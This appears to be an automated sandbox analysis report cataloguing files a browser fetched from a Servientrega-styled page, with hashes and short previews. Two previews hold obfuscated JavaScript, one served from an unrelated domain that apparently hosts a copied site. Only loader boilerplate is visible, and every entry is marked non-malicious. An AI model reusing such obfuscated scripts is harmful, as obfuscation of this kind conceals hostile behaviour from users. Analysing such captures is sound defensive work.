            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="15px" viewBox="0 0 23 15" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="colombia-(2)">.. <path d="M0 2.03535C0 2.98231 0.771174 3.75 1.72253 3.75L21.2775 3.75C22.2288 3.75 23 2.98235 23 2.03535L23 0L0 0L0 2.03535Z" transform="translate(0 11.25)" id="Path" fill="#FF4B55" stroke="none" />.. <path d="M21.2775 0L1.72253 0C0.771174 0 0 0.767645 0 1.71465L0 7.5L23 7.5L23 1.71465C23 0.767645 22.2288 0 21.2775 0Z" id="Path" fill="#FFE15A" stroke="none" />.. <path d="M0 0L23 0L23 3.74991L0 3.74991L0 0Z" transform="translate(0 7.5)" id="Rectangle" fill="#41479B" stroke="none" />.. </g>..</svg>
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text
            Category:dropped
            Size (bytes):15802
            Entropy (8bit):5.27769575476003
            Encrypted:false
            SSDEEP:384:RRi/1mlmJmioi5liTidmi8lieCrxRBKMR5YU:3kBFi2tneCrxRBr
            MD5:617F82307EE3CC183F4EC9FE00563A4E
            SHA1:F39E9E86BC405AFFD360466439CCD0F10A4A707B
            SHA-256:8F1A99A900496EBB2E9FB4CA0DAFD773111F10AC0CFD50090F42505AB6473548
            SHA-512:2A3289C59DF77677E4B74949648A83E0866193C6397E0EBF300A3CA029FAECF2B861335E240A64FF959049AAD994A45D9865703E7998B74DD057D23E6031CA96
            Malicious:false
            Reputation:low
            Preview:jQuery(document).ready(function($) {..//-------------------------- STICKY MENU....var stickyOffset = $('.main-menu').offset().top;.$(window).scroll(function(){. var sticky = $('.main-menu'),. scroll = $(window).scrollTop();.. if (scroll >= stickyOffset) sticky.addClass('fixed');. else sticky.removeClass('fixed');.});..//-------------------------- FUNCIONES RESPONSIVE.... var alterClass = function() {. var ww = document.body.clientWidth;. if (ww < 950) {. $('.menu-container').addClass('offcanvas offcanvas-start').attr("visibility", "visible");. $('.submenu-collapse').removeClass('show');. $('.first-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');. $('.second-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');... } else if (ww >= 951) {. $('.menu-container').removeClass('offcanvas offcanvas-start').attr("visibility", "hidden");. $('.submenu-collapse').addClass('show');. $('.first-lvl').removeClass('collapsed'
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (542)
            Category:downloaded
            Size (bytes):1557
            Entropy (8bit):5.2676094060351035
            Encrypted:false
            SSDEEP:24:4Qqu2OEXWtRRquHNUglFepRWZFwrBevRZRR94uHstvJSuRWZ0fpURRquHNVnmlF3:4QqubYWtsEkpwIAnpcd5wmpUYkpwcc4I
            MD5:BE22BDB0D739BBEAF3D7C00A8F37F3BF
            SHA1:4C22B5376F567CE35C0BF1A60801274D9DB772A6
            SHA-256:B5E57D1C63E5FB18B28FBC6AFC7A7282978C25492FA83E3CC289E02CF43DC6F1
            SHA-512:DEA2F5C865573D5A933DA41547130005DE0542DA4AEF3C470FDCC28E9C99E030BB84C2299D11F51CF98353BC4FF28735544E9AE34B42F95F9A89B63CED537656
            Malicious:false
            Reputation:low
            URL:https://js.hs-scripts.com/22144436.js
            Preview:// HubSpot Script Loader. Please do not block this resource. See more: http://hubs.ly/H0702_H0..var _hsp = window._hsp = window._hsp || [];._hsp.push(['addEnabledFeatureGates', []]);._hsp.push(['setBusinessUnitId', 0]);.!function(t,e,r){if(!document.getElementById(t)){var n=document.createElement("script");for(var a in n.src="https://js.hs-banner.com/v2/22144436/banner.js",n.type="text/javascript",n.id=t,r)r.hasOwnProperty(a)&&n.setAttribute(a,r[a]);var i=document.getElementsByTagName("script")[0];i.parentNode.insertBefore(n,i)}}("cookieBanner-22144436",0,{"data-cookieconsent":"ignore","data-hs-ignore":true,"data-loader":"hs-scriptloader","data-hsjs-portal":22144436,"data-hsjs-env":"prod","data-hsjs-hublet":"na1"});.!function(e,t){if(!document.getElementById(e)){var c=document.createElement("script");c.src="https://js.hs-analytics.net/analytics/1727397000000/22144436.js",c.type="text/javascript",c.id=e;var n=document.getElementsByTagName("script")[0];n.parentNode.insertBefore(c,n)}}("h
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):1450
            Entropy (8bit):5.015913032797666
            Encrypted:false
            SSDEEP:24:2dUnjTxJ24apEvD41d02MwOd0vDtDDOOaFYb4apEvD41dEDZAMwOdaQGwyo6pUiK:cUjTVMvpDyOaJ0pLHvqX
            MD5:861946EDCA51B5DD1F3319A35D4CD17E
            SHA1:143DB14A398ED5B1AC71475C5C67142A595C5E88
            SHA-256:9583D70C1382D43CCAE85F3DDEDE41C68AEB67F377FF963D22EB2F8B407EF92C
            SHA-512:D66C8E644B955A7B91CD86B545CB1994642BA85C8B3F3B8070427D12FDFD3AD3B49B77BED45D987E985F12CF1EC07C6CC8D671D3E3882A1DD666452FE9FB4474
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="Group-23">.. <path d="M11.5 23C17.8513 23 23 17.8513 23 11.5C23 5.14873 17.8513 0 11.5 0C5.14873 0 0 5.14873 0 11.5C0 17.8513 5.14873 23 11.5 23Z" id="Oval" fill="#BFBFBF" fill-rule="evenodd" stroke="none" />.. <g id="youtube-(1)" transform="translate(4.791687 6.708252)">.. <path d="M10.8843 0L2.5324 0C1.12365 0 0 1.19834 0 2.66101L0 7.40149C0 8.88179 1.14042 10.0625 2.5324 10.0625L10.8843 10.0625C12.293 10.0625 13.4167 8.86416 13.4167 7.40149L13.4167 2.66101C13.4167 1.19834 12.2763 0 10.8843 0ZM4.9474 7.20764L4.9474 2.87248L8.46927 5.04006L4.9474 7.20764Z" id="Icon_23_" fill="#FFFFFF" stroke="none" />.. </g>.. <path d="M11.5 23C17.8513 23 23 17.8513 23 11.5C23 5.14873 17.8513 0 11.5 0C5.14873 0 0 5.14873 0 11.5C0 17.8513 5.14873 23 11.5 23Z" id="Oval-Copy" fill="#FF0000" fill-
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (32191), with CRLF line terminators
            Category:downloaded
            Size (bytes):34342
            Entropy (8bit):5.42994637335851
            Encrypted:false
            SSDEEP:768:TpxyiYGAdS/L8kgF55HF+YZkyfu9P/eZw2hhmKHeu:nyFS/Akgn5F+okyfu9emimsX
            MD5:630003C0BB2F3DE3769B438125F4A572
            SHA1:E455F4B344AF907A34D70C758D8E07B5DDE61761
            SHA-256:FEE4E9FD05EC2A9AFDC6C789E3C80027F3C81CF916AAC740D2C2B9419ADF9661
            SHA-512:FB20201CDF9A438F2A6A66E78E6C96BC169885E768FC69DD61251BA457C8432232DC4F25B429C2FC7B2CB759C258DEECD46FC73597502EE5DC140A5B65402632
            Malicious:false
            Reputation:low
            URL:https://uzer.co/js/velocity.min.js
            Preview:/*! VelocityJS.org (1.1.0). (C) 2014 Julian Shapiro. MIT @license: en.wikipedia.org/wiki/MIT_License */../*! VelocityJS.org jQuery Shim (1.0.1). (C) 2014 The jQuery Foundation. MIT @license: en.wikipedia.org/wiki/MIT_License. */..!function(e){function t(e){var t=e.length,r=$.type(e);return"function"===r||$.isWindow(e)?!1:1===e.nodeType&&t?!0:"array"===r||0===t||"number"==typeof t&&t>0&&t-1 in e}if(!e.jQuery){var $=function(e,t){return new $.fn.init(e,t)};$.isWindow=function(e){return null!=e&&e==e.window},$.type=function(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?a[o.call(e)]||"object":typeof e},$.isArray=Array.isArray||function(e){return"array"===$.type(e)},$.isPlainObject=function(e){var t;if(!e||"object"!==$.type(e)||e.nodeType||$.isWindow(e))return!1;try{if(e.constructor&&!n.call(e,"constructor")&&!n.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(r){return!1}for(t in e);return void 0===t||n.call(e,t)},$.each=function(e,r,a){var n,o=0,i=e.length,s=
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (6435), with no line terminators
            Category:dropped
            Size (bytes):6439
            Entropy (8bit):5.298943111390874
            Encrypted:false
            SSDEEP:192:n4Lc06lr/yvf94W4+b3cPlCXcab66E0r9LB:n4Lcr2fd4+b38y579LB
            MD5:5FBC9168099F33AA4A9DBE6B0E026F9A
            SHA1:9D6A89162F21C45D32B18973499C020EE99CDD34
            SHA-256:87C7C690CB7577EBA6CB9872A88DDE9C0E5EEC424DD43043DB93FF98CF883CA6
            SHA-512:2EC963095914C1F1A17CA09CE6E4B144BC3E1EFF6661CEC3F026013237C675018904E96CD89D13113A4C484C57B3A1B0F81D345E00AE132766BF2CD6401035EA
            Malicious:false
            Reputation:low
            Preview:const a7_0x25e538=a7_0x8251;(function(_0x20f9cd,_0x570bd7){const _0x449509=a7_0x8251,_0x1dd7ee=_0x20f9cd();while(!![]){try{const _0x9cfeb4=parseInt(_0x449509(0xba))/0x1*(parseInt(_0x449509(0x9c))/0x2)+-parseInt(_0x449509(0xcd))/0x3+-parseInt(_0x449509(0xb6))/0x4*(-parseInt(_0x449509(0x8c))/0x5)+parseInt(_0x449509(0xd2))/0x6*(parseInt(_0x449509(0xb5))/0x7)+-parseInt(_0x449509(0xa7))/0x8*(-parseInt(_0x449509(0xa0))/0x9)+-parseInt(_0x449509(0x90))/0xa+parseInt(_0x449509(0x94))/0xb;if(_0x9cfeb4===_0x570bd7)break;else _0x1dd7ee['push'](_0x1dd7ee['shift']());}catch(_0x20d3d6){_0x1dd7ee['push'](_0x1dd7ee['shift']());}}}(a7_0x46e2,0x3e1e1));const a7_0x533ad1=(function(){let _0x168b1e=!![];return function(_0x313e68,_0x2506dd){const _0x5eef0c=_0x168b1e?function(){const _0x57e7f0=a7_0x8251;if(_0x2506dd){const _0x357f94=_0x2506dd[_0x57e7f0(0xbc)](_0x313e68,arguments);return _0x2506dd=null,_0x357f94;}}:function(){};return _0x168b1e=![],_0x5eef0c;};}()),a7_0x323946=a7_0x533ad1(this,function(){const
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (52350)
            Category:downloaded
            Size (bytes):53555
            Entropy (8bit):5.230265232165562
            Encrypted:false
            SSDEEP:1536:RAn6CSJREGPG+2uZ8w/Hupaxn+XmxMAwDR+F:W6CSJRJj2uZh/UC+WxMAwQF
            MD5:2A5DD6EFBF0BAA60EA160589DD726A5B
            SHA1:3060D83734324095F001DFFE217E5AB08C8F7B65
            SHA-256:ED3131AADB5AE07949EA19DD3B05F4EE6D05FA96706D144D407199D36DEEF753
            SHA-512:9DB275C2085F47B096D8EEA93B42B59A69489DE22AA894B947DB095C5C7589094B3EDB0582B160BDE41FE814E4C6ADA2B187C789800D53C0DF7B213225482ABA
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/assets/7ae8a4f5ajMSD.js
            Preview:const a19_0x5b7454=a19_0x4fa0;(function(_0x23dfe7,_0x52eff6){const _0x15ff47=a19_0x4fa0,_0x55c0f4=_0x23dfe7();while(!![]){try{const _0x269b9c=-parseInt(_0x15ff47(0x23b))/0x1+parseInt(_0x15ff47(0x24e))/0x2*(parseInt(_0x15ff47(0x220))/0x3)+-parseInt(_0x15ff47(0x297))/0x4+parseInt(_0x15ff47(0x21f))/0x5+parseInt(_0x15ff47(0x202))/0x6*(-parseInt(_0x15ff47(0x282))/0x7)+-parseInt(_0x15ff47(0x2ad))/0x8*(-parseInt(_0x15ff47(0x233))/0x9)+parseInt(_0x15ff47(0x1f3))/0xa*(-parseInt(_0x15ff47(0x1c7))/0xb);if(_0x269b9c===_0x52eff6)break;else _0x55c0f4['push'](_0x55c0f4['shift']());}catch(_0xbd9262){_0x55c0f4['push'](_0x55c0f4['shift']());}}}(a19_0x13b0,0x55457));import{s as a19_0x2e3254,u as a19_0x27bd72,x as a19_0x1e98b9,r as a19_0x3f1aba,n as a19_0x39a09e,y as a19_0x48f11e,d as a19_0x5e11a3,z as a19_0x15e471,A as a19_0x3c8d9a,a as a19_0x4334da,w as a19_0x3533e8}from'./index-7c1edef8.js';function a19_0x4fa0(_0x3a77bd,_0x232e91){const _0x58a9dc=a19_0x13b0();return a19_0x4fa0=function(_0x304c44,_0x3a3
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):2605
            Entropy (8bit):4.8933879201323105
            Encrypted:false
            SSDEEP:48:kMBqaFD5H2ozCNiWuicUiircsiiIuicBii4w7T49lyGyKhhJEkFpq2ABv:XWZi9l2Khh2kr0v
            MD5:CF991972AE30DA40FE47F658106E4D23
            SHA1:81D52308423FB4F8978BF92F4A9C9969D3A440A2
            SHA-256:47DDF4DDC2865482645D0F1CC39F160EF09FCC4FC7BBD260BBA92DAB2E526835
            SHA-512:E29FE6FE9BCF76909F667F3A201413BB1CE3522ABDF041DB8040D10F341B724ED8E2A8B7D73586A00DCD554C764A00582D3684D13E22A169EA7C379EC8A6F2CB
            Malicious:false
            Reputation:low
            Preview:jQuery(document).ready(function($) {....//-------------------------- STICKY MENU......var stickyOffset = $('.main-menu').offset().top;....$(window).scroll(function(){.. var sticky = $('.main-menu'),.. scroll = $(window).scrollTop();.... if (scroll >= stickyOffset) sticky.addClass('fixed');.. else sticky.removeClass('fixed');..});....//-------------------------- FUNCIONES RESPONSIVE...... var alterClass = function() {.. var ww = document.body.clientWidth;.. if (ww < 950) {.. $('.menu-container').addClass('offcanvas offcanvas-start').attr("visibility", "visible");.. $('.submenu-collapse').removeClass('show');.. $('.first-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.. $('.second-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.. $('.sub-menu-container').addClass('collapse');.... } else if (ww >= 951) {.. $('.menu-container').removeClass('offcanvas offcanvas-start').attr("visibility", "hidden");.. $('.su
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):4900
            Entropy (8bit):4.506731891504076
            Encrypted:false
            SSDEEP:96:q1mPpkzqO6VfBSE2k99BmM0R8eFoaykkZGH:Sp3+V2kjBmM0RToHZq
            MD5:07B36F8AB24C62887848A83B92C500B5
            SHA1:99E5A0CB980E1D9690C8A399B4D6592C2F8A32DC
            SHA-256:2E6A5002DABD85D84D3FB481C610E1069562022C19963DAED0F238E11CCA2A33
            SHA-512:9B7208EDF8C3F37745B4DDBC6BC050B0F2AA27E7195A02C754FBAB52AF38CC1C1C2A19A592A26A097F87DCCA8CF568A6D9DFFE8912F242EB185CA3D2C1E80167
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Group 14</title>. <g id="Plantilla-1---Menus-desplegados" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Menu-Soluciones" transform="translate(-146.000000, -126.000000)">. <g id="Group-13" transform="translate(86.000000, 95.000000)">. <g id="Group-14" transform="translate(60.000000, 31.000000)">. <rect id="Rectangle" fill="#FFFFFF" opacity="0" x="0" y="0" width="43" height="30"></rect>. <g id="Group-11" transform="translate(0.000000, 12.893769)">. <g id="Group-3" transform="translate(10.500000, 0.000000)" fill="#009A44">. <path d="M30.5531449,14.1506171 L27.8758304,14.1506171 C27.6334276,13.0941357 26.6321555,12.3023561 25.4369611,12.3023561 C24.26
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):2455
            Entropy (8bit):4.776407386577479
            Encrypted:false
            SSDEEP:48:cUaIaLYXh0wgmHGFPYG9IE/przmUmI7E+LDUVuLmf:xTag0lRIUpUMLY
            MD5:D741920A5F7DB758D6FD1679D20ADA4E
            SHA1:A516676B75C9064896E618D18FE7CD06D8E926DB
            SHA-256:BDF2A35AAE3D41CDEE4ECC3D2433A3CAB11117801D5A82E409B9C20607927F50
            SHA-512:B5F16F1E05A7776C3FAAD5A84CBD796394E56C0790D7AE1F5CAD580C1C8324BE3EA4D7409658A22DEA22BB66C938EE58C4C7041DC0543E6D65850A4B13ED7D17
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/flag-pan.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="15px" viewBox="0 0 23 15" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="panama">.. <g id="Group">.. <path d="M11.5 0.393437L0.39657 0.393437L0.39657 7.475C0.39657 7.69226 0.218994 7.86844 0 7.86844L10.174 7.86844C11.1254 7.86844 11.8966 7.10336 11.8966 6.15952L11.8966 0C11.8966 0.217264 11.719 0.393437 11.5 0.393437Z" transform="translate(11.10343 7.0815625)" id="Path" fill="#F5F5F5" stroke="none" />.. <path d="M0.39657 7.475L11.5 7.475L11.5 0.393437C11.5 0.176173 11.6776 0 11.8966 0L1.72253 0C0.771174 4.4567e-05 0 0.765126 0 1.70897L0 7.86844C0 7.65117 0.177576 7.475 0.39657 7.475Z" id="Path" fill="#F5F5F5" stroke="none" />.. </g>.. <path d="M9.77747 0L0.39657 0C0.177576 0 0 0.176173 0 0.393437L0 7.47496L11.1034 7.47496C11.3224 7.47496 11.5 7.29878 11.5 7.08152L11.5 1.70892C11.5 0.765082 10.7288 0 9.77747 0Z" transform="translate(11.5 6.1035156E
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):1536
            Entropy (8bit):5.219906144393995
            Encrypted:false
            SSDEEP:24:t4LRndFtxY6bgwHFUHc87OOJXLZckYWz6/5uKRxseAwHFUHc87OOJ48byF5lMihY:+RHgFPXLZcfWz6hWP4nFTS
            MD5:E5C5A06E062EF5D90996B78EA47F34E0
            SHA1:68D40AE874118DD4CFD57A78FA15281608211E3F
            SHA-256:80940BC522CF67814164D1BD2A3C642CE1783F4D80958D2E0CBEC812B01AAF3F
            SHA-512:2A07B2628FD195489EF82A43D8E6CC64734B4D614475B95AB47BD9B54A68FD0102567BCACFAE17916C70556C779A6EC6881A9A21E2BE74538F9E856EC21F73B3
            Malicious:false
            Reputation:low
            Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0,0,256,256" width="23px" height="23px"><g fill="none" fill-rule="nonzero" stroke="#262028" stroke-width="32" stroke-linecap="butt" stroke-linejoin="miter" stroke-miterlimit="10" stroke-dasharray="" stroke-dashoffset="0" font-family="none" font-weight="none" font-size="none" text-anchor="none" style="mix-blend-mode: normal"><path d="M120.42141,236.26563c-55.60791,0 -100.68704,-45.07912 -100.68704,-100.68704v-15.15719c0,-55.60791 45.07912,-100.68704 100.68704,-100.68704h15.15719c55.60791,0 100.68704,45.07912 100.68704,100.68704v15.15719c0,55.60791 -45.07912,100.68704 -100.68704,100.68704z" id="shape"></path></g><g fill="none" fill-rule="none" stroke="none" stroke-width="1" stroke-linecap="butt" stroke-linejoin="miter" stroke-miterlimit="10" stroke-dasharray="" stroke-dashoffset="0" font-family="none" font-weight="none" font-size="none" text-anchor="none" style="mix-blend-mode: normal"><g transfor
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (2485)
            Category:dropped
            Size (bytes):25226
            Entropy (8bit):5.299886609169562
            Encrypted:false
            SSDEEP:768:so/MPtWU9YwUpxbY/Y3YOgQYeYZYHYZYVY+Y9RW8gtgePWe7dtbacTj:RIT7sZwuvL54WAclt
            MD5:5717F9683FC74E4BD1D041D04026A6A4
            SHA1:ECEEF812A403BD16CECD332E822F60DC6F9D6536
            SHA-256:BF6CA87D4B9262CE13240D90B7077F84EF5BE0855836D0D30B2B84CA777DD519
            SHA-512:C194BBA8A991CB5F8419A98F98D3C26C76CF30F3CD9C0557D5471ACF63BAD7FF46B4A321071EEE24C59F8A59BE05B78D376A3A2FF7D3EF6EA2AFF5FFBE1CC65B
            Malicious:false
            Reputation:low
            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with CRLF line terminators
            Category:downloaded
            Size (bytes):1836
            Entropy (8bit):4.696338008769207
            Encrypted:false
            SSDEEP:48:4uMdxhxmac2Z1i3KqgHs1FK2WSmAA89863AyI1i:GdxOnZCH8T98sAyIk
            MD5:81279E22C8ECE9E1D0536A402484DAA3
            SHA1:911797507FB12D4F451D5900E32DB96AD697C401
            SHA-256:5C6237178E88AB7F1C6E26C9E99547E58782450B8F2A182129448FF4D99E89AB
            SHA-512:4B510D6CE8A76B4FB3CFF4019AE56DE39E22B2F53B13BA5DD27BEFC0251B468FFB6D7547CAC66654F8FAA7F2413D0E2A1667C5A11BD36FCD312731D0C0C0BE6C
            Malicious:false
            Reputation:low
            URL:https://cdn.jsdelivr.net/gh/Wruczek/Bootstrap-Cookie-Alert@gh-pages/cookiealert.js
            Preview:/*.. * Bootstrap Cookie Alert by Wruczek.. * https://github.com/Wruczek/Bootstrap-Cookie-Alert.. * Released under MIT license.. */..(function () {.. "use strict";.... var cookieAlert = document.querySelector(".cookiealert");.. var acceptCookies = document.querySelector(".acceptcookies");.... if (!cookieAlert) {.. return;.. }.... cookieAlert.offsetHeight; // Force browser to trigger reflow (https://stackoverflow.com/a/39451131).... // Show the alert if we cant find the "acceptCookies" cookie.. if (!getCookie("acceptCookies")) {.. cookieAlert.classList.add("show");.. }.... // When clicking on the agree button, create a 1 year.. // cookie to remember user's choice and close the banner.. acceptCookies.addEventListener("click", function () {.. setCookie("acceptCookies", true, 365);.. cookieAlert.classList.remove("show");.... // dispatch the accept event.. window.dispatchEvent(new Event("cookieAlertAccept")).. })
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Web Open Font Format (Version 2), TrueType, length 27824, version 1.0
            Category:downloaded
            Size (bytes):27824
            Entropy (8bit):7.992205463452374
            Encrypted:true
            SSDEEP:768:on/d4pqqWBoOAvg3UxP8Z1LmxHdlimj/L0HGH472SZy:onF4AFBoOARPssHxz0LZy
            MD5:225D39D1D4443E97F2AD20B9D91808FE
            SHA1:518045D265D6C388AC38DDE9FDEB364474A90787
            SHA-256:84221E6C0C5F950B44D38A40BC19FFA9A340B2A5D207CB6F6461B84D474F2555
            SHA-512:66899B2619C0C56329F73D3BFACA96749EE2E1B2261D729945BD7E4A807761DB72127D1137F853E0933CBBED51D80CED3078354D6ED2D1A4068D1FBC64CAFA64
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/assets/84221e6ctE5dP.woff2
            Preview:wOF2......l...........l?................................l?HVAR.I.`?STAT.8'...V/~....$.c..p.0....6.$..\. ..`..Q.....%.^w..6.........w.......C..........I....n........`..O..}T..\..p.8..0c.>..Dt..k..hE.X.u.d....l...A.]...u.a...J...z.\....."m.....X6bR2....m&...v.7/.H7.0..p<......eU".......4.;.E6...V...5=....g.;.<...........9...#E.}....G...V....l.r...\.....@ A.(R%..f.-U..@..{^T..>....).nx~n=....N..v.n.....X.,......0..$......k.....y.V....bnU..{Q^t.......TT.A\1.F.j.-....3.."<0:..G.-.\i..B'.....s...hD.M ... .3...~..../.JD....Ga.y.....9b.!|....W...H.6.W.........R.].H...z^.x...X...7.... ...h...Y.......)..n.\.!T...;..N..4..V.....jc.[...G...I.%...|@P".:.g%-.c;...@b.....!..g..l.$..W.......6...I..A^..6+LU.q....._)x.?2sf..'y.......0."..=..r.....vT.3.=.i.n.!..vv...R.-P,4....#f@...6..(..(.......<..n......'.......}zS.....[\.yi.s...|...[.C.ci......A..@.-.R..Q7KR.}F/.K..x!G...(.H..y.A..!V)......E.K.+.....mU.2..p.9./p*A..~..6.M.3..M....p...h.An.....k...
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:GIF image data, version 89a, 16 x 16
            Category:downloaded
            Size (bytes):825
            Entropy (8bit):5.928155937589366
            Encrypted:false
            SSDEEP:12:GtdBjVZb/QirLEYairL+PT8airLhzHvmEirLb5v8pirLV+01M+irLF+vmEirLH7k:WnDJLDHLq4LhzeFLuiLV++MzLFmYLbk
            MD5:62C0A6925A589E3EAAD809B23C9EC31C
            SHA1:F1B251CE6565F0948C1B6A651FDFBB2B1C81B416
            SHA-256:FCDBC127C2E8495D699E3B206607D5FFCC133179897005AEC1A0194D2469F7F6
            SHA-512:F0006A49CE3564274EF41803AAA6D58BE03451ADA90608F8F59D697BDF765D7DC4DF8A1AC7DDB05DA60E0AFCA7E7BB08B6CA5777D7A32FBFB43873CD371A0F54
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/css/images/loading.gif
            Preview:GIF89a..........zzz.........................................!..NETSCAPE2.0.....!.......,..........H..B..Z.g)....}.H..I.l...at. .......p...p....&..|.....Q.^....."'.N..!.......,..........H..J..Z..1....}.H..I.l...qt.A .......p........&..|.....Q.^....."'.N..!.......,..........H.....Z..9....}.H..I.l....tS. .......p..e0....&..|.....Q.^....."'.N..!.......,..........H....Z.'.....}.H..I.l...0tSQ .......p..E ....&..|.....Q.^....."'.N..!.......,..........H.....Z.......}.H..I.l... t.a .......p...@....&..|...@.Q.^....."'.N..!.......,..........H....Z.......}.H..I.l...At.q .......p..%.....&..|...B.Q.^....."'.N..!.......,..........H.....Z.'!....}.H..I.l..T.t.. .......p...P....&..|.....Q.^....."'.N..!.......,..........H.....Z.g.....}.H..I.l..TQt.0 .......p...`....&..|.....Q.^....."'.N..;
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:HTML document, ASCII text, with no line terminators
            Category:downloaded
            Size (bytes):13
            Entropy (8bit):2.7773627950641693
            Encrypted:false
            SSDEEP:3:qVZPV:qzd
            MD5:C83301425B2AD1D496473A5FF3D9ECCA
            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
            Malicious:false
            Reputation:low
            URL:https://td.doubleclick.net/td/ga/rul?tid=G-94GBDVKM3R&gacid=228618068.1727397051&gtm=45je49p0v867598331za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&_ng=1&aip=1&fledge=1&frm=0&tag_exp=101671035~101747727&z=1522954775
            Preview:<html></html>
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (4552), with no line terminators
            Category:dropped
            Size (bytes):4610
            Entropy (8bit):5.356020738194316
            Encrypted:false
            SSDEEP:96:P5os1J+dHineKNNM7J4+EIh4sLjGmWaYrv:P+s1J+kneKNNM7J4bIh4sLamWaYrv
            MD5:13DAA4A507B49DD53878AFE39D51735F
            SHA1:D3F4BC9BFF3E967CE3EAA77906107F1A4DB26787
            SHA-256:7CA3B59C946225CE2999B75A25520ACED25F0E485D96C46580B77D1793003999
            SHA-512:2C088BA4692D57FE3AE23000D59FEA20471EEC65EB8EDF8F6DDD71F5D48873F0140B381C911191A3FD8E4B3E4F3A5D7492E07307A1C14BAD6FD6DF13EF84592A
            Malicious:false
            Reputation:low
